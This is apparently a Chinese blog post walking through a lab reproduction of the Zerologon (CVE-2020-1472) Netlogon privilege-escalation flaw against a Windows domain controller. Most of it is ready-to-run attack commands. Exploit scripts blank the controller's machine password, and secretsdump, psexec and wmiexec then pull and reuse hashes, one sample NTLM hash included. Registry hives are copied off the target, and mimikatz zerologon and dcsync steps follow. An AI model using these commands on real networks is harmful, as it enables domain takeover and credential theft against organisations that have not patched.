cve-2020-1472,netlogon特權提升漏洞復現
阿新 • • 發佈:2020-10-20
cve-2020-1472,netlogon特權提升漏洞,
漏洞原理:攻擊者通過NetLogon(MS-NRPC),建立與域控間易受攻擊的安全通道時,可利用此漏洞獲取域管訪問許可權。成功利用此漏洞的攻擊者可以在該網路中的裝置上執行經特殊設計的應用程式。
影響版本號:
Windows Server 2008 R2 for x64-based Systems Service Pack 1 Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) Windows Server 2012 Windows Server 2012 (Server Core installation) Windows Server 2012 R2 Windows Server 2012 R2 (Server Core installation) Windows Server 2016 Windows Server 2016 (Server Core installation) Windows Server 2019 Windows Server 2019 (Server Core installation) Windows Server, version 1903 (Server Core installation) Windows Server, version 1909 (Server Core installation) Windows Server, version 2004 (Server Core installation)
工具 zerologon_teste
pip3 install -r requirements
安裝requirements的依賴環境
安裝最新的impacket方法:
git clone https://github.com/SecureAuthCorp/impacket.git
cd impacket
virtualenv --python=python3 impacket
source impacket/bin/activate
pip3 install .
python3 -m pip install .
step1:探測目標機是否存在cve-2020-1472
python3 zerologon_tester.py 域控主機名 域控IP python3 zerologon_tester.py win08 192.168.223.133
step2: 將目標機中域控win08$的密碼清空
python3 cve-2020-1472-exploit.py 域控主機名 域控IP
python3 cve-2020-1472-exploit.py win08 192.168.223.133
step3:使用impacket下的secretdump.py去獲取域控的HASH
secretsdump.py test.com/win08\[email protected] -no-pass
使用PTH登入域控;
psexec.py test.com/[email protected] -hashes :獲取的administrator中hash值 wmiexec.py test.com/[email protected] -hashes :獲取的administrator中hash值 wmiexec.py test.com/[email protected] -hashes :afffeba176210fad4628f0524bfe1942
執行系統命令
reg save hklm\sam sam.hive
reg save hklm\system system.hive
reg save hklm\security security.hive
注:上述產生的檔案是存在目標機中,需要匯出到攻擊機中;
get sam.hive
get system.hive
get security.hive
使用mimikatz或者secretsdumo.py讀取檔案
secretsdump.py -sam sam.hive -system system.hive -security security.hive LOCAL
step4:恢復域控的密碼
python3 reinstall_original_pw.py win08 192.168.223.133 79e0831681fc703c76295202fac36b0570a0d536a302ecc37341df6018b2918941743a443f9c19f26edc57c7b0dfa4f26c83419552bd45e5f110622582f27f649dd4a63be6e93d106f68b2d03043b4e24f076177084534594750ac8fc054bf3118f4bd73ac506cafb051d60d6fcff4852474ceebba12726551d81031e84e06d21380b96f1b0ad6d9736854af6fe20719aa70342ac77f75099521854ad02cac1901b87300172f03b1e185de535ebc22a568fd38c9ab53bd4fa3d621126af124e5eb1c7d74470add983f16420ca005156442bde6e08a4312fe510712911f408efde41dbd9ea8e2c0281872362250a07d2c
python3 secretdump.py test.com/win08\[email protected] -no-pass
使用mimikatz.exe去攻擊域控
檢測目標機是否存在cve2020-1472
lsadump::zerologon /target:域控IP /account:域控主機名$
lsadump::zerologon /target:192.168.223.133 /account:win08$
清空域控密碼
lsadump::zerologon /target:域控IP /account:域控主機名$ /exploit
lsadump::zerologon /target:192.168.223.133 /account:win08$ /exploit
獲取目標機的HASH
lsadump::dcsync /domain:de1ay.com /dc:dc.de1ay.com /user:krbtgt /authuser:dc$ /authdomain:de1ay.com /authpassword:"" /authntlm
注意:本地測試需要將DNS指向域控
lsadump::dcsync /domain:test.com /win08:win08.test.com /user:administrator /authuser:win08$ /authdomain:test.com /authpassword:"" /authntlm
恢復密碼
lsadump::postzerologon /target:dc.de1ay.com /account:dc$
lsadump::postzerologon /target:192.168.223.133 /account:win08$
注:mimikatz在讀取域內HASH的時候需要配置DNS 指向域控 /dc: win08.test.com 這裡填寫域控的完整的名字 ; 輸入引數都正確的情況還獲取不了, 重啟AD服務 在恢復密碼的時候注意先去執行privilege::debug